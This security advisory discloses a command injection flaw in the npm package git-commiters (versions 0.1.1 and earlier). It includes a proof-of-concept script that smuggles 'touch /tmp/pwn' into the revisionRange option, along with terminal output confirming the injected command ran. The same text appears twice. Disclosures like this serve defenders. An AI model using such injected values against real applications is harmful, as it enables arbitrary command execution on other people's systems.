Headline
GHSA-g38c-wxjf-xrh6: `git-comiters` Command Injection vulnerability
Background on the vulnerability
This vulnerability manifests with the library’s primary exported API: gitCommiters(options, callback)
which allows specifying options such as cwd for current working directory and revisionRange as a revision pointer, such as HEAD.
However, the library does not sanitize for user input or practice secure process execution API to separate commands from their arguments and as such, uncontrolled user input is concatenated into command execution.
Exploit
- Install
git-commiters@0.1.1or earlier - Initiaizlie a new Git directory with commits in it
- Create the following script in that directory:
var gitCommiters = require("git-commiters");
var options = {
cwd: "./",
revisionRange: "HEAD; touch /tmp/pwn; #",
};
gitCommiters(options, function (err, result) {
if (err) console.log(err);
else console.log(result);
});
- Observe new file created on disk at
/tmp/pwn
The git commiters functionality works as expected, too, despite the command execution, which further hinders the problem as it may not be apparent that a command injection occured on a running application.
@lirantal ➜ /workspaces/git-commiters.js (master) $ node app.js
[
{
email: 'github@qslw.com',
name: 'Morton Fox',
deletions: 1,
insertions: 1,
commits: 1
},
{
email: 'snowyu.lee@gmail.com',
name: 'Riceball LEE',
deletions: 11,
insertions: 1198,
commits: 7
}
]
@lirantal ➜ /workspaces/git-commiters.js (master) $ ls -alh /tmp/pwn
-rw-r--rw- 1 codespace codespace 0 Jul 1 06:09 /tmp/pwn
Credit
Liran Tal
Background on the vulnerability
This vulnerability manifests with the library’s primary exported API: gitCommiters(options, callback)
which allows specifying options such as cwd for current working directory and revisionRange as a revision pointer, such as HEAD.
However, the library does not sanitize for user input or practice secure process execution API to separate commands from their arguments and as such, uncontrolled user input is concatenated into command execution.
Exploit
- Install git-commiters@0.1.1 or earlier
- Initiaizlie a new Git directory with commits in it
- Create the following script in that directory:
var gitCommiters = require(“git-commiters”);
var options = { cwd: "./", revisionRange: "HEAD; touch /tmp/pwn; #", }; gitCommiters(options, function (err, result) { if (err) console.log(err); else console.log(result); });
- Observe new file created on disk at /tmp/pwn
The git commiters functionality works as expected, too, despite the command execution, which further hinders the problem as it may not be apparent that a command injection occured on a running application.
@lirantal ➜ /workspaces/git-commiters.js (master) $ node app.js [ { email: 'github@qslw.com’, name: 'Morton Fox’, deletions: 1, insertions: 1, commits: 1 }, { email: 'snowyu.lee@gmail.com’, name: 'Riceball LEE’, deletions: 11, insertions: 1198, commits: 7 } ]
@lirantal ➜ /workspaces/git-commiters.js (master) $ ls -alh /tmp/pwn -rw-r–rw- 1 codespace codespace 0 Jul 1 06:09 /tmp/pwn
Credit
Liran Tal
References
- GHSA-g38c-wxjf-xrh6
- snowyu/git-commiters.js@7f0abfe